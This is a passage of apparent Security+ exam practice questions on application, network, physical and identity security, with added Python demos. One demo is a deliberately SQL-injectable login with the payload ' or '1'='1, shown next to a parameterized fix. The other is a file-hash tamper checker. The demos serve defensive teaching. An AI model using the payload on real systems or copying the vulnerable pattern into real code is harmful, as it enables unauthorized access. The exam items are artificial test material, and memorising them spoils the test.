- C. Substantial penalties for breach of contract
- D. Standby contracts with other vendors
- 76. Abigail is responsible for datacenters in a large, multinational company. She has to support
- multiple datacenters in diverse geographic regions. What would be the most effective
- way for her to manage these centers consistently across the enterprise?
- A. Hire datacenter managers for each center.
- B. Implement enterprise-wide SDN.
- C. Implement Infrastructure as Code (IaC).
- D. Automate provisioning and deprovisioning.
- 77. Olivia is responsible for web application security for her company’s e-commerce server.
- She is particularly concerned about XSS and SQL injection. Which technique would be
- most effective in mitigating these attacks?
- A. Proper error handling
- B. The use of stored procedures
- C. Proper input validation
- D. Code signing
- 78. Sophia wants to test her company’s web application to see if it is handling input validation
- and data validation properly. Which testing method would be most effective for this?
- A. Static code analysis
- B. Fuzzing
- C. Baselining
- D. Version control
- 79. Omar is using the waterfall method for software development in his company. Which of
- the following is the proper sequence for the waterfall method?
- A. Requirements, design, implementation, testing, deployment, maintenance
- B. Planning, designing, coding, testing, deployment
- C. Requirements, planning, designing, coding, testing, deployment
- D. Design, coding, testing, deployment, maintenance
- 80. Lilly is responsible for security on web applications for her company. She is checking to
- see that all applications have robust input validation. What is the best way to implement
- validation?
- A. Server-side validation
- B. Client-side validation
- C. Validate in transit
- D. Client-side and server-side validation
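- Questions 61, 77 and 80 all ask how to keep attacker-controlled text out of the SQL a web application sends to its database. The following is an added example, not code from the original page: against an in-memory SQLite table with constructed sample rows, a login query assembled by string concatenation accepts the classic `' or '1'='1` payload and returns every user, while a version that combines server-side validation with a parameterized query (the same separation of code from data that a stored procedure with bound parameters gives you) returns nothing for the payload and only the matching row for real credentials. The table, user names and passwords are constructed for the demonstration; real systems store password hashes, not plaintext.

```python
import re
import sqlite3

# Constructed sample data for the demonstration only.
USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55word")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Deliberately vulnerable: user input is spliced into the SQL text.

    With the payload ' or '1'='1 the statement becomes
    ... WHERE username = '' or '1'='1' AND password = '' or '1'='1'
    which is true for every row.
    """
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


# Server-side validation: only the characters a username may legitimately contain.
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def login_safe(conn, username: str, password: str):
    """Validate on the server, then bind values with placeholders.

    The database receives the statement and the values separately, so the
    payload is compared as a literal string and never parsed as SQL.
    """
    if not USERNAME_RE.fullmatch(username):
        return []
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run both versions against the same payload and against real credentials."""
    conn = make_db()
    payload = "' or '1'='1"
    vuln = login_vulnerable(conn, payload, payload)
    safe = login_safe(conn, payload, payload)
    legit = login_safe(conn, "alice", "s3cret")
    return vuln, safe, legit


if __name__ == "__main__":
    print(demo())
```

- Client-side validation is still worth having for usability, but it can be bypassed by anyone who talks to the server directly, which is why the check belongs on the server as well. A stored procedure gives the same protection only if it binds its arguments; one that builds dynamic SQL from them inside the database is just as injectable.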
- 81. Edward is responsible for web application security at a large insurance company. One
- of the applications that he is particularly concerned about is used by insurance adjusters
- in the field. He wants to have strong authentication methods to mitigate misuse of the
- application. What would be his best choice?
- A. Authenticate the client with a digital certificate.
- B. Implement a very strong password policy.
- C. Secure application communication with TLS.
- D. Implement a web application firewall (WAF).
- 82. Sarah is the CIO for a small company. The company uses several custom applications
- that have complicated interactions with the host operating system. She is concerned about
- ensuring that systems on her network are all properly patched. What is the best approach
- in her environment?
- A. Implement automatic patching.
- B. Implement a policy that has individual users patch their systems.
- C. Delegate patch management to managers of departments so they can find the best
- patch management for their departments.
- D. Immediately deploy patches to a test environment, then as soon as testing is complete
- have a staged rollout to the network.
- 83. John is examining the logs for his company’s web applications. He discovers what he
- believes is a breach. After further investigation, it appears as if the attacker executed code
- from one of the libraries the application uses, code that is no longer even used by the
- application. What best describes this attack?
- A. Buffer overflow
- B. Code reuse attack
- C. DoS attack
- D. Session hijacking
- 84. Emiliano is a network administrator and is concerned about the security of peripheral
- devices. Which of the following would be a basic step he could take to improve security
- for those devices?
- A. Implement FDE.
- B. Turn off remote access (SSH, telnet, etc.) if not needed.
- C. Utilize fuzzy testing for all peripherals.
- D. Implement digital certificates for all peripherals.
- 85. Ixxia is a software development team manager. She is concerned about memory leaks in
- code. What type of testing is most likely to find memory leaks?
- A. Fuzzing
- B. Stress testing
- C. Static code analysis
- D. Normalization
- 86. Victor is a network administrator for a medium-sized company. He wants to be able to
- access servers remotely so that he can perform small administrative tasks from remote
- locations. Which of the following would be the best protocol for him to use?
- A. SSH
- B. Telnet
- C. RSH
- D. SNMP
- 87. Mark is responsible for a server that runs sensitive software for a major research facility.
- He is very concerned that only authorized software executes on this server. He is also
- concerned about malware masquerading as legitimate, authorized software. What
- technique would best address this concern?
- A. Secure boot
- B. Software attestation
- C. Sandboxing
- D. TPM
- 88. Hannah is a programmer with a large software company. She is interested in ensuring that
- the module she just created will work well with a module created by another programmer.
- What type of testing is this?
- A. Unit testing
- B. Regression testing
- C. Stress testing
- D. Integration testing
- 89. Erik is responsible for the security of a SCADA system. Availability is a critical issue.
- Which of the following is most important to implement?
- A. SIEM
- B. IPS
- C. Automated patch control
- D. Honeypot
- 90. You are concerned about the security of new devices your company has implemented.
- Some of these devices use SoC technology. What would be the best security measure you
- could take for these?
- A. Using a TPM
- B. Ensuring each has its own cryptographic key
- C. Using SED
- D. Using BIOS protection
- 91. Vincent works for a company that manufactures portable medical devices, such as insulin
- pumps. He is concerned about ensuring these devices are secure. Which of the following is
- the most important step for him to take?
- A. Ensure all communications with the device are encrypted.
- B. Ensure the devices have FDE.
- C. Ensure the devices have individual antimalware.
- D. Ensure the devices have been fuzz tested.
- 92. Emile is concerned about securing the computer systems in vehicles. Which of the following
- vehicle types has significant cybersecurity vulnerabilities?
- A. UAV
- B. Automobiles
- C. Airplanes
- D. All of the above
- 93. Ariel is responsible for software development in her company. She is concerned that the
- software development team integrates well with the network system. She wants to ensure
- that software development processes are aligned with the security needs of the entire
- network. Which of the following would be most important for her to implement?
- A. Integration testing
- B. Secure DevOps
- C. Clear policies
- D. Employee training
- 94. Greg is a programmer with a small company. He is responsible for the web application.
- He has become aware that one of the modules his web application uses may have a security
- flaw allowing an attacker to circumvent authentication. There is an update available
- for this module that fixes the flaw. What is the best approach for him to take to mitigate
- this threat?
- A. Submit an RFC.
- B. Immediately apply the update.
- C. Place the update on a test server, then if it works apply it to the production server.
- D. Document the issue.
- 95. You are using a sophisticated system that models various attacks on your networks. You
- intend for this system to help your team realize weak areas and improve response to
- incidents. What is the most important step to take before relying on data from this system?
- A. Get approval from a CAB.
- B. Thoroughly review the system’s documentation.
- C. Verify the models being used.
- D. Perform integration testing on the system.
- 96. Your company has an accounting application that was developed in-house. It has been in
- place for 36 months, and functioning very well, with very few issues. You have just made
- a minor change to the tax calculation based on a change in tax law. What should be your
- next step?
- A. Deploy the change.
- B. Get CAB approval for the change.
- C. Perform stress testing.
- D. Perform regression testing.
- 97. Tom works as a software development manager for a large company. He is trying to
- explain to management the difference between compiled code and runtime code. What is
- the biggest advantage of compiled code?
- A. Better performance
- B. Platform independence
- C. More secure
- D. Faster development time
- 98. Your company is interested in keeping data in the cloud. Management feels that public
- clouds are not secure but is concerned about the cost of a private cloud. What is the
- solution you would recommend?
- A. Tell them there are no risks with public clouds.
- B. Tell them they will have to find a way to budget for a private cloud.
- C. Suggest that they consider a community cloud.
- D. Recommend against a cloud solution at this time.
- 99. Your development team primarily uses Windows, but they need to develop a specific solution
- that will run on Linux. What is the best solution to getting your programmers access
- to Linux systems for development and testing?
- A. Set their machines to dual-boot Windows and Linux.
- B. PaaS
- C. Set up a few Linux machines for them to work with as needed.
- D. IaaS
- 100. Daniel works for a mid-sized financial institution. The company has recently moved some
- of its data to a cloud solution. Daniel is concerned that the cloud provider may not support
- the same security policies as the company’s internal network. What is the best way to
- mitigate this concern?
- A. Implement a cloud access security broker.
- B. Perform integration testing.
- C. Establish cloud security policies.
- D. Implement Security as a Service.
- 101. Hanz is responsible for the e-commerce servers at his company. He is concerned about
- how they will respond to a DoS attack. Which software testing methodology would be
- most helpful in determining this?
- A. Regression testing
- B. Stress testing
- C. Integration testing
- D. Fuzz testing
- 102. You are the CIO for a small company. The company wants to use cloud storage for some
- of its data, but cost is a major concern. Which of the following cloud deployment models
- would be best?
- A. Community cloud
- B. Private cloud
- C. Public cloud
- D. Hybrid cloud
- 103. Alisha is monitoring security for a mid-sized financial institution. Under her predecessor
- there were multiple high-profile breaches. Management is very concerned about detecting
- any security issues or breach of policy as soon as possible. Which of the following would
- be the best solution for this?
- A. Monthly audits
- B. NIPS
- C. NIDS
- D. Continuous monitoring
- 104. Helga works for a bank and is responsible for secure communications with the online
- banking application. The application uses TLS to secure all customer communications.
- She has noticed that since migrating to larger encryption keys, the server’s performance
- has declined. What would be the best way to address this issue?
- A. Implement a VPN concentrator.
- B. Implement an SSL accelerator.
- C. Return to smaller encryption keys.
- D. Upgrade all servers.
- 105. What is the primary advantage of allowing only signed code to be installed on computers?
- A. It guarantees that malware will not be installed.
- B. It improves patch management.
- C. It verifies who created the software.
- D. It executes faster on computers with a TPM.
- 106. Which of the following is the best description for VM sprawl?
- A. When VMs on your network outnumber physical machines
- B. When there are more VMs than IT can effectively manage
- C. When a VM on a computer begins to consume too many resources
- D. When VMs are spread across a wide area network
- 107. Which of the following is the best description of a stored procedure?
- A. Code that is in a DLL, rather than the executable
- B. Server-side code that is called from a client
- C. SQL statements compiled on the database server as a single procedure that can be
- called
- D. Procedures that are kept on a separate server from the calling application, such as in
- middleware
- 108. Farès is responsible for security at his company. He has had bollards installed around the
- front of the building. What is Farès trying to accomplish?
- A. Gated access for people entering the building
- B. Video monitoring around the building
- C. Protecting against EMI
- D. Preventing a vehicle from being driven into the building
- 109. Jane is concerned about servers in her datacenter. She is particularly worried about EMI.
- What damage might EMI most likely cause to servers?
- A. Damage to chips (CPU or RAM)
- B. Temperature control issues
- C. Malware infections
- D. The staff could be locked out of the servers.
- 110. You are concerned about VM escape attacks. Which of the following would provide the
- most protection against this?
- A. Completely isolate the VM from the host.
- B. Install a host-based antivirus on both the VM and the host.
- C. Implement FDE on both the VM and the host.
- D. Use a TPM on the host.
- 111. Teresa is the network administrator for a small company. The company is interested in a
- robust and modern network defense strategy but lacks the staff to support it. What would
- be the best solution for Teresa to use?
- A. Implement SDN.
- B. Use automated security.
- C. Use Security as a Service.
- D. Implement only as many security controls as they can support.
- 112. Dennis is trying to set up a system to analyze the integrity of applications on his network.
- He wants to make sure that the applications have not been tampered with or Trojaned.
- What would be most useful in accomplishing this goal?
- A. Implement NIPS.
- B. Use cryptographic hashes.
- C. Sandbox the applications in question.
- D. Implement NIDS.
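- Question 112 asks for cryptographic hashes to detect applications that have been tampered with or Trojaned, and question 105 makes the related point that code signing tells you who built the software. The following is an added example, not code from the original page: it records a SHA-256 baseline manifest of every file under a directory and later reports which files were modified, added or removed. The "installed applications" are constructed in a temporary directory so the example runs offline; the file names and contents are assumptions for illustration.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> dict:
    """Map relative path -> SHA-256 for every file under root (the known-good state)."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def verify_against(root: str, baseline: dict) -> dict:
    """Compare the current tree with the baseline and report every difference."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline three files, then Trojan one, drop one, delete one."""
    with tempfile.TemporaryDirectory() as root:
        for name, data in [("app.exe", b"legit app v1"),
                           ("lib.dll", b"legit lib"),
                           ("conf.ini", b"x=1")]:
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(data)
        baseline = build_baseline(root)

        # Attacker activity after the baseline was taken.
        with open(os.path.join(root, "lib.dll"), "wb") as handle:
            handle.write(b"legit lib" + b"\x90" * 8)      # library patched in place
        with open(os.path.join(root, "evil.dll"), "wb") as handle:
            handle.write(b"dropped")                        # new file planted
        os.remove(os.path.join(root, "conf.ini"))           # config deleted

        return verify_against(root, baseline)


if __name__ == "__main__":
    print(demo())
```

- The manifest is only as trustworthy as its storage: keep it read-only and off the monitored host, or sign it, because an attacker who can alter a binary and then re-run the baseline simply hides the change. A hash tells you that a file changed; a signature (question 105) additionally tells you whether the new contents came from the expected publisher.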
- 113. George is a network administrator at a power plant. He notices that several turbines had
- unusual ramp-ups in cycles last week. After investigating, he finds that an executable was
- uploaded to the system control console and caused this. Which of the following would be
- most effective in preventing this from affecting the SCADA system in the future?
- A. Implement SDN.
- B. Improve patch management.
- C. Place the SCADA system on a separate VLAN.
- D. Implement encrypted data transmissions.
- 114. Tom is responsible for VPN connections in his company. His company uses IPSec for
- VPNs. What is the primary purpose of AH in IPSec?
- A. Encrypt the entire packet.
- B. Encrypt just the header.
- C. Authenticate the entire packet.
- D. Authenticate just the header.
- 115. Mia is a network administrator for a bank. She is responsible for secure communications
- with her company’s customer website. Which of the following would be the best for her to
- implement?
- A. SSL
- B. PPTP
- C. IPSec
- D. TLS
- 116. Abigail is responsible for setting up an NIPS on her network. The NIPS is located in one
- particular network segment. She is looking for a passive method to get a copy of all traf-
- fic to the NIPS network segment so that it can analyze the traffic. Which of the following
- would be her best choice?
- A. Using a network tap
- B. Using port mirroring
- C. Setting the NIPS on a VLAN that is connected to all other segments
- D. Setting up an NIPS on each segment
- 117. Janice is explaining how IPSec works to a new network administrator. She is trying to
- explain the role of IKE. Which of the following most closely matches the role of IKE in
- IPSec?
- A. It encrypts the packet.
- B. It establishes the SAs.
- C. It authenticates the packet.
- D. It establishes the tunnel.
- 118. Jeff is the security administrator for an e-commerce site. He is concerned about DoS
- attacks. Which of the following would be the most effective in addressing this?
- A. DDoS mitigator
- B. WAF with SPI
- C. NIPS
- D. Increased available bandwidth
- 119. Doug is a network administrator for a small company. The company has recently implemented
- an e-commerce server. This has placed a strain on network bandwidth. What
- would be the most cost-effective means for him to address this issue?
- A. Isolate the new server on a separate network segment.
- B. Upgrade the network to CAT 7.
- C. Move to fiber optic.
- D. Implement aggregation switches.
- 120. Liam is responsible for monitoring security events in his company. He wants to see how
- diverse events may connect. He is interested in identifying different indicators of compromise
- that may point to the same breach. Which of the following would be most helpful for
- him to implement?
- A. NIDS
- B. SIEM
- C. Correlation engine
- D. Aggregation switch
- 121. Emily manages the IDS/IPS for her network. She has an NIPS installed and properly
- configured. It is not detecting obvious attacks on one specific network segment. She has
- verified that the NIPS is properly configured and working properly. What would be the
- most efficient way for her to address this?
- A. Implement port mirroring for that segment.
- B. Install an NIPS on that segment.
- C. Upgrade to a more effective NIPS.
- D. Isolate that segment on its own VLAN.
- 122. You have been instructed to find a VPN solution for your company. Your company uses
- TACACS+ for remote access. Which of the following would be the best VPN solution for
- your company?
- A. PPTP
- B. RADIUS
- C. L2TP
- D. CHAP
- 123. Jacob is the CIO for a mid-sized company. His company has very good security policies
- and procedures. The company has outsourced its web application development to a well-known
- web programming company. Which of the following should be the most important
- security issue for Jacob to address?
- A. The web application vendor’s hiring practices
- B. The financial stability of the web application vendor
- C. Security practices of the web application vendor
- D. Having an escrow for the source code
- 124. Gerard is responsible for physical security at his company. He is considering using cameras
- that would detect a burglar entering the building at night. Which of the following
- would be most useful in accomplishing this goal?
- A. Motion-sensing camera
- B. Infrared-sensing camera
- C. Sound-activated camera
- D. HD camera
- 125. Tim is implementing a Faraday cage around his server room. What is the primary purpose
- of a Faraday cage?
- A. Regulate temperature
- B. Regulate current
- C. Block intrusions
- D. Block EMI
- 126. You are working for a large company. You are trying to find a solution that will provide
- controlled physical access to the building and record every employee who enters the
- building. Which of the following would be the best for you to implement?
- A. A security guard with a sign-in sheet
- B. Smart card access
- C. A camera by the entrance
- D. A sign-in sheet by the front door
- 127. David is responsible for cryptographic keys in his company. What is the best way to
- deauthorize a public key?
- A. Send out a network alert.
- B. Delete the digital certificate.
- C. Publish that certificate in the CRL.
- D. Notify the RA.
- 128. Thomas is trying to select the right fire extinguisher for his company’s server room.
- Which of the following would be his best choice?
- A. Type A
- B. Type B
- C. Type C
- D. Type D
- 129. Carole is concerned about security for her server room. She wants the most secure lock
- she can find for the server room door. Which of the following would be the best choice for
- her?
- A. Combination lock
- B. Key-in-knob
- C. Deadbolt
- D. Padlock
- 130. What is the ideal humidity range for a server room?
- A. 70% to 80%
- B. 40% to 60%
- C. Below 30%
- D. Above 70%
- 131. Molly is implementing biometrics in her company. Which of the following should be her
- biggest concern?
- A. FAR
- B. FRR
- C. CER
- D. EER
- 132. Daniel is responsible for physical security in his company. All external doors have
- electronic smart card access. In an emergency such as a power failure, how should the
- doors fail?
- A. Fail secure
- B. Fail closed
- C. Fail open
- D. Fail locked
- 133. Donald is responsible for networking for a defense contractor. He is concerned that
- emanations from UTP cable could reveal classified information. Which of the following
- would be his most effective way to address this?
- A. Migrate to CAT 7 cable.
- B. Implement protected cabling.
- C. Place all cable in a Faraday cage.
- D. Don’t send any classified information over the cable.
- 134. Fred is responsible for physical security in his company. He wants to find a good way
- to protect the USB thumb drives that have BitLocker keys stored on them. Which of the
- following would be the best solution for this situation?
- A. Store the drives in a secure cabinet.
- B. Encrypt the thumb drives.
- C. Don’t store BitLocker keys on these drives.
- D. Lock the thumb drives in desk drawers.
- 135. Juanita is responsible for servers in her company. She is looking for a fault-tolerant
- solution that can handle two drives failing. Which of the following should she select?
- A. RAID 1+0
- B. RAID 3
- C. RAID 5
- D. RAID 6
- 136. You are a network administrator for a mid-sized company. You need all workstations to
- have the same configuration. What would be the best way for you to accomplish this?
- A. Push out a configuration file.
- B. Implement a policy requiring all workstations to be configured the same way.
- C. Ensure all computers have the same version of the operating system and the same
- applications installed.
- D. Use a master image that is properly configured and image all workstations from that.
- 137. Mike is a network administrator for an e-commerce company. There have been several
- updates to the operating system, the web server software, and the web application, all
- within the last 24 hours. It appears that one of these updates has caused a significant
- security problem. What would be the best approach for Mike to take to correct this
- problem?
- A. Remove the updates one at a time to see which corrects the problem.
- B. Roll the server back to the last known good state.
- C. Investigate and find out which update caused the problem, and remove only that
- update.
- D. Investigate and find out which update caused the problem, and find a patch for that
- issue.
- 138. Which device would most likely process the following rules?
- PERMIT IP ANY EQ 443
- DENY IP ANY ANY
- A. NIPS
- B. HIPS
- C. Content filter
- D. Firewall
- 139. Ixxia is responsible for security at a mid-sized company. She wants to prevent users on her
- network from visiting job-hunting sites while at work. Which of the following would be
- the best device to accomplish this goal?
- A. Proxy server
- B. NAT
- C. Firewall
- D. NIPS
- 140. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the
- following techniques would be best in assuring availability?
- A. A VPN concentrator
- B. Aggregate switching
- C. An SSL accelerator
- D. Load balancing
- 141. When you are concerned about application security, what is the most important issue in
- memory management?
- A. Never allocate a variable any larger than is needed.
- B. Always check bounds on arrays.
- C. Always declare a variable where you need it (i.e., at function or file level if possible).
- D. Make sure you release any memory you allocate.
- 142. Darrel is looking for a cloud solution for his company. One of the requirements is that
- the IT staff can make the transition with as little change to the existing infrastructure as
- possible. Which of the following would be his best choice?
- A. Off-premises cloud
- B. On-premises cloud
- C. Hybrid solution
- D. Use only a community cloud
- 143. Ryan is concerned about the security of his company’s web application. Since the
- application processes confidential data, he is most concerned about data exposure. Which
- of the following would be the most important for him to implement?
- A. WAF
- B. TLS
- C. NIPS
- D. NIDS
- 144. Arjun has just taken over web application security for a small company. He notices that
- some values are temporarily stored in hidden fields on one of the web pages. What is this
- called and how would it be best characterized?
- A. This is obfuscation, a weak security measure.
- B. This is data hiding, a weak security measure.
- C. This is obfuscation, a possible security flaw.
- D. This is data hiding, a possible security flaw.
- 145. What is the primary reason a company would consider implementing Agile programming?
- A. To speed up development time
- B. To improve development documentation
- C. To focus more on design
- D. To focus more on testing
- 146. When you’re implementing security cameras in your company, which of the following is
- the most important concern?
- A. High-definition video
- B. Large storage capacity
- C. How large an area the camera can cover
- D. Security of the camera and video storage
- 147. What is the primary security issue presented by monitors?
- A. Unauthorized users may see confidential data.
- B. Data can be detected from electromagnetic emanations.
- C. Poor authentication
- D. Screen burn
- 148. Clark is responsible for mobile device security in his company. Which of the following is
- the most important security measure for him to implement?
- A. Encrypted drives
- B. Patch management
- C. Remote wiping
- D. Geotagging
- 149. Which of the following security measures is most effective against phishing attacks?
- A. User training
- B. NIPS
- C. Spam filters
- D. Content filter
- 150. You are the CISO for a mid-sized health care company. Which of the following is the most
- important for you to implement?
- A. Industry best practices
- B. Contractual requirements
- C. Strong security policies
- D. Regulatory requirements
- +++++
- ++++
- 4
- Identity and Access
- Management
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 4.1 Compare and contrast identity and access
- management concepts.
- ■ ■
- Identification, authentication, authorization and accounting
- (AAA)
- ■ ■
- Multifactor authentication
- ■ ■ Something you are
- ■ ■ Something you have
- ■ ■ Something you know
- ■ ■ Somewhere you are
- ■ ■ Something you do
- ■ ■ Federation
- ■ ■ Single sign-on
- ■ ■ Transitive trust
- ✓ ✓ 4.2 Given a scenario, install and configure identity and
- access services.
- ■ ■ LDAP
- ■ ■ Kerberos
- ■ ■ TACACS+
- ■ ■ CHAP
- ■ ■ PAP
- ■ ■ MSCHAP
- ■ ■ RADIUS
- ■ ■ SAML
- ■ ■ OpenID Connect■ ■ OAUTH
- ■ ■ Shibboleth
- ■ ■ Secure token
- ■ ■ NTLM
- ✓ ✓ 4.3 Given a scenario,implement identity and access
- management controls.
- ■ ■
- ■ ■
- ■ ■
- ■ ■
- ■ ■
- Access control models
- ■ ■ MAC
- ■ ■ DAC
- ■ ■ ABAC
- ■ ■ Role-based access control
- ■ ■ Rule-based access control
- Physical access control
- ■ ■ Proximity cards
- ■ ■ Smart cards
- Biometric factors
- ■ ■ Fingerprint scanner
- ■ ■ Retinal scanner
- ■ ■ Iris scanner
- ■ ■ Voice recognition
- ■ ■ Facial recognition
- ■ ■ False acceptance rate
- ■ ■ False rejection rate
- ■ ■ Crossover error rate
- Tokens
- ■ ■ Hardware
- ■ ■ Software
- ■ ■ HOTP/TOTP
- Certificate-based authentication
- ■ ■ PIV/CAC/smart card
- ■ ■ IEEE 802.1x■ ■ File system security
- ■ ■ Database security
- ✓ ✓ 4.4 Given a scenario, differentiate common account
- management practices.
- ■ ■
- ■ ■
- ■ ■
- Account types
- ■ ■ User account
- ■ ■ Shared and generic accounts/credentials
- ■ ■ Guest accounts
- ■ ■ Service accounts
- ■ ■ Privileged accounts
- General Concepts
- ■ ■ Least privilege
- ■ ■ Onboarding/offboarding
- ■ ■ Permission auditing and review
- ■ ■ Usage auditing and review
- ■ ■ Time-of-day restrictions
- ■ ■ Recertification
- ■ ■ Standard naming convention
- ■ ■ Account maintenance
- ■ ■ Group-based access control
- ■ ■ Location-based policies
- Account policy enforcement
- ■ ■ Credential management
- ■ ■ Group policy
- ■ ■ Password complexity
- ■ ■ Expiration
- ■ ■ Recovery
- ■ ■ Disablement
- ■ ■ Lockout
- ■ ■ Password history
- ■ ■ Password reuse
- ■ ■ Password lengthChapter 4
- 114
- ■
- Identity and Access Management
- 1. Jack is using smart cards for authentication. He is trying to classify the type of
- authentication for a report to his CIO. What type of authentication is Jack using?
- A. Type I
- B. Type II
- C. Type III
- D. Strong
- 2. Carole is responsible for various network protocols at her company. The network time
- protocol has been intermittently failing. Which of the following would be most affected?
- A. Kerberos
- B. RADIUS
- C. CHAP
- D. LDAP
- 3. You are selecting an authentication method for your company’s servers. You are looking
- for a method that periodically reauthenticates clients to prevent session hijacking. Which
- of the following would be your best choice?
- A. PAP
- B. SPAP
- C. CHAP
- D. OAUTH
- 4. Emiliano is working for a small company. His company is concerned about
- authentication and wants to implement biometrics using facial recognition and fingerprint scanning.
- How would this authentication be classified?
- A. Type I
- B. Type II
- C. Type III
- D. Strong
- 5. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle
- database server. Which of the following would be the best type of account to assign to the
- database service?
- A. User
- B. Guest
- C. Admin
- D. Service
- 6. You have been asked to select an authentication method that will support single sign-on,
- integrate with SAML, and work well over the Internet. Which of the following would be
- your best choice?
- A. Shibboleth
- B. OAUTH
- C. SPAP
- D. CHAP
- 7. Which authentication method was used as a native default for older versions of Microsoft
- Windows?
- A. PAP
- B. CHAP
- C. OAUTH
- D. NTLM
- 8. Carl has been asked to set up access control for a server. The requirements state that users
- at a lower privilege level should not be able to see or access files or data at a higher
- privilege level. What access control model would best fit these requirements?
- A. MAC
- B. DAC
- C. RBAC
- D. SAML
- 9. Clarice is concerned about an attacker getting information regarding network resources
- in her company. Which protocol should she implement that would be most helpful in
- mitigating this risk?
- A. LDAP
- B. TLS
- C. SNMP
- D. LDAPS
- 10. Ahmed is looking for an authentication protocol for his network. He is very concerned
- about highly skilled attackers. As part of mitigating that concern, he wants an
- authentication protocol that never actually transmits a user’s password, in any form. Which
- authentication protocol would be a good fit for Ahmed’s needs?
- A. CHAP
- B. Kerberos
- C. RBAC
- D. Type II
- 11. You work for a social media website. You wish to integrate your users’ accounts with
- other web resources. To do so, you need to allow authentication to be used across differ-
- ent domains, without exposing your users’ passwords to these other services. Which of the
- following would be most helpful in accomplishing this goal?
- A. Kerberos
- B. SAML
- C. OAUTH
- D. OpenID
- 12. Mary is trying to set up remote access to her network for salespeople in her company.
- Which protocol would be most helpful in accomplishing this goal?
- A. RADIUS
- B. Kerberos
- C. CHAP
- D. OpenID
- 13. Victor is trying to identify the protocol used by Windows for authentication to a server
- that is not part of the network domain. Which of the following would be most useful for
- Victor?
- A. Kerberos
- B. NTLM
- C. OpenID
- D. CHAP
- 14. You have been asked to find an authentication service that is handled by a third party.
- The service should allow users to access multiple websites, as long as they support the
- third-party authentication service. What would be your best choice?
- A. OpenID
- B. Kerberos
- C. NTLM
- D. Shibboleth
- 15. Abigail is implementing biometrics for her company. She is trying to get the false rejection
- rate and false acceptance rate to the same level. What is the term used for this?
- A. Crossover error rate
- B. Leveling
- C. Balanced error rate
- D. Remediation
- 16. Mia is responsible for website security for a bank. When a user forgets their password, she
- wants a method to give them a temporary password. Which of the following would be the
- best solution for this situation?
- A. Facial recognition
- B. Digital certificate authentication
- C. RBAC
- D. TOTP
- 17. George wants a secure authentication protocol that can integrate with RADIUS and can
- use digital certificates. Which of the following would be his best choice?
- A. CHAP
- B. 802.11i
- C. 802.1x
- D. OAUTH
- 18. Jacob is responsible for database server security in his company. He is very concerned
- about preventing unauthorized access to the databases. Which of the following would be
- the most appropriate for him to implement?
- A. ABAC
- B. TOTP
- C. HIDS
- D. DAMP
- 19. Mason is responsible for security at a company that has traveling salespeople. The
- company has been using ABAC for access control to the network. Which of the following is an
- issue that is specific to ABAC and might cause it to incorrectly reject logins?
- A. Geographic location
- B. Wrong password
- C. Remote access is not allowed by ABAC.
- D. Firewalls usually block ABAC.
- 20. You work for a U.S. defense contractor. You are setting up access cards that have chips
- embedded in them to provide access control for users in your company. Which of the
- following types of cards would be best for you to use?
- A. CAC
- B. PIV
- C. NFC
- D. Smart card
- 21. Darrell is concerned that users on his network have too many passwords to remember and
- might write down their passwords, thus creating a significant security risk. Which of the
- following would be most helpful in mitigating this issue?
- A. OAUTH
- B. SSO
- C. OpenID
- D. Kerberos
- 22. Fares is a security administrator for a large company. Occasionally, a user needs to access
- a specific resource that they don’t have permission to access. Which access control
- methodology would be most helpful in this situation?
- A. Mandatory Access Control
- B. Discretionary Access Control
- C. Role-based Access Control
- D. Rule-based Access Control
- 23. You are comparing biometric solutions for your company, and the product you pick must
- have an appropriate False Acceptance Rate (FAR). Which of the following best describes
- FAR?
- A. How often an unauthorized user is granted access by mistake
- B. How readily users accept the new technology, based on ease of use
- C. How often an authorized user is not granted access
- D. How frequently the system is offline
- 24. Amelia is looking for a network authentication method that can use digital certificates
- and does not require end users to remember passwords. Which of the following would
- best fit her requirements?
- A. OAUTH
- B. Tokens
- C. OpenID
- D. RBAC
- 25. You are responsible for setting up new accounts for your company network. What is the
- most important thing to keep in mind when setting up new accounts?
- A. Password length
- B. Password complexity
- C. Account age
- D. Least privileges
- 26. Stefan just became the new security officer for a university. He is concerned that student
- workers who work late on campus could try and log in with faculty credentials. Which of
- the following would be most effective in preventing this?
- A. Time of day restrictions
- B. Usage auditing
- C. Password length
- D. Credential management
- 27. Jennifer is concerned that some people in her company have more privileges than they
- should. This has occurred due to people moving from one position to another, and having
- cumulative rights that exceed the requirements of their current jobs. Which of the
- following would be most effective in mitigating this issue?
- A. Permission auditing
- B. Job rotation
- C. Preventing job rotation
- D. Separation of duties
- 28. Chloe has noticed that users on her company’s network frequently have simple passwords
- made up of common words. Thus, they have weak passwords. How could Chloe best
- mitigate this issue?
- A. Increase minimum password length.
- B. Have users change passwords more frequently.
- C. Require password complexity.
- D. Implement Single Sign-On (SSO).
- 29. Bart is looking for a remote access protocol for his company. It is important that the
- solution he selects support multiple protocols and use a reliable network communication
- protocol. Which of the following would be his best choice?
- A. RADIUS
- B. TACACS+
- C. NTLM
- D. CHAP
